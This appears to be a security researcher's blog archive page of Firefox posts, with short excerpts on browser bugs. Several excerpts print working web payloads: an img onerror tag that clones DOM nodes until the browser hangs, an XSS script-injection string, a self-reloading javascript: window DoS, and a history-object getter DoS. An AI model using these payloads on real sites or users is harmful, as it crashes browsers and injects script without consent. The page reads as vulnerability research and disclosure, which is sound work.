Check this DOS in Firefox:-
<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">
There are many DOM related Firefox problems, this was one of the more interesting ones I found
-
« Home
Contents
The Spanner
Firefox —
Category Archives: Firefox
WebFu crouching tab hidden dos
Hello my student here I’ll show you the way of the tiger, if a deadly Firefox ninja approaches your dojo with a XSS punch:-
"><script>alert(/XSS PUNCH!/)</script>
Then you can respond with the crouching tab hidden dos move:-
self.location = "javascript:window.open(’javascript:document.clear();
document.open();document.close();self.location=self.location’)";
This move can frustrate your opponent into submission.
Firefox history DOS attack
Here’s a complete DOS attack on Firefox using the history object:-
window.onload = function() {
history.__defineGetter__("x", function() {
for(i in this) {
try {
alert(this[i]);
} catch(e) {
}
}
});
history.x;
}
Tested on Firefox 2.0.0.9 mac, a window pops up [...]
Spoofing Firefox protected objects
I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know ).
There are [...]
Noscript has iframe protection
For those of you that read my blog you’ll know that I’m not a big fan of iframes for various reasons. I wrote a Javascript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now….noscript now has iframe protection which is fantastic news, [...]